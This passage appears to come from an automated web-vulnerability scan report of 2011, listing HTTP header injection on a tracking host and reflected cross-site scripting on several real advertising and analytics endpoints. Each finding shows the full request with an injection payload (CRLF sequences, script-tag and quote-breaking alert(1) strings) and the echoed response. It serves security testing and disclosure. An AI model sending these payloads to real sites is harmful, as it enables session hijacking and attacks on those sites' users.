The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f335d%0d%0a6c92f1d82cf was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /5/c=25/b=1225394?f335d%0d%0a6c92f1d82cf=1 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Feb 2011 02:23:34 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdy6jIGBUS%2Fl7URjBlkGBgElBjDoBZM8l8GU4FcwxcsMpoTaIHI3IYLSEB4fmOJ6DKZEFcAU%2F18wJcwBpth4wRSHEZjiE4WoFAZTAschRj%2BD6HODWBsBESyGUCUQi943MDQArf0HMVofzBOIgAiaQhzhDyQArR4Vqg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1mX%2Fv2w5zMDAqJfydqIxSIyBzVlWiYmBQZKB4T8jA8OX%2F3%2BAFJARI7RpEyNMGMhQENq0A5lvo8z1F5nPpBTvgqyfUWirJUj%2B%2F18on4FDpk4d3SKu1kkYQvUN6ELcCbvQhTgfL8dUtRNdiK%2FiLbqQrNlFdCEAS1pZFg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/
Location: http://f335d
6c92f1d82cf=1
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0

2.8. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1225400

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2f2f5%0d%0a3a2cc9ab32b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /5/c=25/b=1225400?2f2f5%0d%0a3a2cc9ab32b=1 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Feb 2011 02:23:08 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdzaw8DAqJfyVjeXQZaBQUCJAQx6wSTPZTAl%2BBVM8TKDKaE2iNxNiKA0hMcHprgegylRBTDF%2FxdMCXOAKTZeMMVhBKb4RCEqhcGUwHGI0c8g%2Btwg1kZABIshVAnEovcNDA1AM%2FXBFO8%2FiCNMIaZEgAW5%2FIFsAG6pFWY%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:08 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1p7%2FX7bcZWBg1Et5q5sLEmNgc5ZVYmJgkGRg%2BM%2FIwPDl%2Fx8gBWQoCW3awQgTBjIUhDZtAvH%2F%2F4XwGZXiXZDVMypz%2FUVWzyi01RJFPQOHTJ06ukVcrZMwhOob0IW4E3ahC3E%2BXo6paie6EF%2FFW3QhWbOL6EIAg7Jacg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:08 GMT; Path=/
Location: http://2f2f5
3a2cc9ab32b=1
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0

2.9. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1226041

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2bdae%0d%0a32111a498f8 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /5/c=25/b=1226041?2bdae%0d%0a32111a498f8=1 HTTP/1.1
Host: tags.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Feb 2011 02:23:36 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: aud=ABR4nGNgYGDwzdy6goGBUS%2Fl7YyHDLIMDAJKDGDQCyZ5LoMpwa9gipcZTAm1QeRuQgSlITw%2BMMX1GEyJKoAp%2Fr9gSpgDTLHxgikOIzDFJwpRKQymBI5DjH4G0ecGsTYCIlgMoUogFr1vYGgAmqkPpnj%2FQRxhCjElAizI5Q9kAwA5%2FRZh; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/
Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1hX%2Fv2w5yMDAqJfydsZDkBgDm7OsEhMDgyQDw39GBoYv%2F%2F8AKSCjT2irJSNMGMiQEdq0A5lvI7RpEzLfQpnrLzKfWSneBdk8RgYOmTp1dIu4WidhCNU3oAtxJ%2BxCF%2BJ8vBxT1U50Ib6Kt%2BhCsmYX0YUA271YNQ%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/
Location: http://2bdae
32111a498f8=1
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0

3. Cross-site scripting (reflected)  previous  next
There are 91 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

3.1. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 5f6c7<script>alert(1)</script>9faa69a0bfd was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1430720&pid=11287695f6c7<script>alert(1)</script>9faa69a0bfd&ps=-1&zw=475&zh=200&url=http%3A//forums.winamp.com/&v=5&dct=Winamp%20Forums&metakw=media%20player,mp3%20player,music%20player,ipod%20sync,multimedia%20player,player,winamp HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:43:39 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "11287695f6c7<script>alert(1)</script>9faa69a0bfd"

   
                                                           </head>
...[SNIP]...
3.2. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload ce49b--><script>alert(1)</script>7267909dc51 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1430720ce49b--><script>alert(1)</script>7267909dc51&pid=1128769&ps=-1&zw=475&zh=200&url=http%3A//forums.winamp.com/&v=5&dct=Winamp%20Forums&metakw=media%20player,mp3%20player,music%20player,ipod%20sync,multimedia%20player,player,winamp HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:43:16 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3257


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1430720ce49b--><script>alert(1)</script>7267909dc51" -->
...[SNIP]...
3.3. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 78c7f--><script>alert(1)</script>c5a78cccd8b was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1430720&pid=1128769&ps=-178c7f--><script>alert(1)</script>c5a78cccd8b&zw=475&zh=200&url=http%3A//forums.winamp.com/&v=5&dct=Winamp%20Forums&metakw=media%20player,mp3%20player,music%20player,ipod%20sync,multimedia%20player,player,winamp HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:44:02 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3696


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-178c7f--><script>alert(1)</script>c5a78cccd8b" -->
   
...[SNIP]...
3.4. http://alterianwaserver.alterianconnect.net/tracking.aspx/gettoken/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alterianwaserver.alterianconnect.net
Path:   /tracking.aspx/gettoken/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e85e0<script>alert(1)</script>0928072ac46 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tracking.aspx/gettoken/?callback=this.altTracker.onReceiveTokene85e0<script>alert(1)</script>0928072ac46&noCacheIE=1298762276937 HTTP/1.1
Host: alterianwaserver.alterianconnect.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Expires: Sat, 26 Feb 2011 23:20:10 GMT
Last-Modified: Sat, 26 Feb 2011 23:20:10 GMT
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:20:09 GMT
Content-Length: 137

this.altTracker.onReceiveTokene85e0<script>alert(1)</script>0928072ac46({"ClientID":"2","Token":"d3a7e42c-0813-438b-a35b-6ce10d72ee05"});
3.5. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitevents/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alterianwaserver.alterianconnect.net
Path:   /tracking.aspx/submitevents/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2b978<script>alert(1)</script>00c0c3b016f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tracking.aspx/submitevents/?Token=37fb592e-52fa-4ee1-8178-cbb08165d406&Session=25aa86a5-ea98-45f3-a174-e3469a6e00b9&callback=this.altTracker.onEventSubmitAck2b978<script>alert(1)</script>00c0c3b016f&Events=%5B%7B%22EventID%22%3A%221%22%2C%22EventTime%22%3A%22%2FDate(1298762276936)%2F%22%2C%22Asset%22%3A%22http%3A%2F%2Fwebcontent.alterian.com%2F%7Chttp%3A%2F%2Fwebcontent.alterian.com%2F%22%2C%22Value%22%3A%22%22%7D%5D&noCacheIE=1298762279411 HTTP/1.1
Host: alterianwaserver.alterianconnect.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:20:31 GMT
Content-Length: 90

this.altTracker.onEventSubmitAck2b978<script>alert(1)</script>00c0c3b016f({"Result":"1"});
3.6. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitsession/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alterianwaserver.alterianconnect.net
Path:   /tracking.aspx/submitsession/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f4af1<script>alert(1)</script>977a3000986 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tracking.aspx/submitsession/?Token=37fb592e-52fa-4ee1-8178-cbb08165d406&callback=this.altTracker.onSessionSubmitAckf4af1<script>alert(1)</script>977a3000986&timeoffset=360&scrres=1920%20x%201200&username=&trackedsite=alterian-content-management.com&ref=unknown&noCacheIE=1298762278213 HTTP/1.1
Host: alterianwaserver.alterianconnect.net
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Expires: Sat, 26 Feb 2011 23:20:30 GMT
Last-Modified: Sat, 26 Feb 2011 23:20:30 GMT
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:20:29 GMT
Content-Length: 212

this.altTracker.onSessionSubmitAckf4af1<script>alert(1)</script>977a3000986({"Session":"84f479f4-e135-4bfd-8e26-2c450d11bf62","SessionDurationInMinutes":"15","NumofEventsinaSubmit":"30","SubmitDuration":"5000"});
3.7. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/3992-121072-16279-0

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55c54'-alert(1)-'aa8bf6ae2f0 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/3992-121072-16279-0?mpt=77383421555c54'-alert(1)-'aa8bf6ae2f0&mpvc=http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 527
Date: Sun, 27 Feb 2011 02:31:59 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch/2011/02/16/forbes-accused-of-link-;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=http://altfarm.mediaplex.com/ad/ck/3992-121072-16279-0?mpt=77383421555c54'-alert(1)-'aa8bf6ae2f0">
...[SNIP]...
3.8. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/3992-121072-16279-0

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55d8a'%3balert(1)//2ee66e943dc was submitted in the mpvc parameter. This input was echoed as 55d8a';alert(1)//2ee66e943dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/3992-121072-16279-0?mpt=773834215&mpvc=http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=55d8a'%3balert(1)//2ee66e943dc HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 527
Date: Sun, 27 Feb 2011 02:32:18 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch/2011/02/16/forbes-accused-of-link-;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=55d8a';alert(1)//2ee66e943dchttp://altfarm.mediaplex.com/ad/ck/3992-121072-16279-0?mpt=773834215">
...[SNIP]...
3.9. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/3992-121072-16279-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8535c'%3balert(1)//a8fa310d924 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8535c';alert(1)//a8fa310d924 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/3992-121072-16279-0?mpt=773834215&mpvc=http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=&8535c'%3balert(1)//a8fa310d924=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=12309:25586/1551:17023/12525:37966/14960:18534/15017:34880

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 530
Date: Sun, 27 Feb 2011 02:32:52 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838219/0/6/AdId=1491683;BnId=1;itime=773834215;kvpg=techcrunch/2011/02/16/forbes-accused-of-link-;kvugc=0;kvmn=93311141;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=&8535c';alert(1)//a8fa310d924=1http://altfarm.mediaplex.com/ad/ck/3992-121072-16279-0?mpt=773834215">
...[SNIP]...
3.10. http://api.postup.com/TCTUL001/twidget/1.jsonp [jsonp parameter]  previous  next

Summary

Severity:   High
